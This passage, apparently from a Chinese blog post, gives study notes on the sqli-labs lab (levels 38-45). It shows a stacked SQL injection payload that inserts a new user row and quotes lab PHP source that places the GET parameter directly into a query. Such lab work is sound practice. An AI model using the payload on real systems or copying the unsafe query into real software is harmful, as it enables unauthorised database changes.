前言
继续学习sqli-labs
本篇是less 38-45
Less - 38: GET- Stacked Query Injection - String 堆叠注入 - 字符型 - GET
虽然常规注入可以成功
但本题侧重学习堆叠注入
?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
创建用户成功
看眼源码
<?php
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
//mysql connections for stacked query examples.
$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);
// Check connection
if (mysqli_connect_errno($con1))
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
else
{
@mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");
}
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"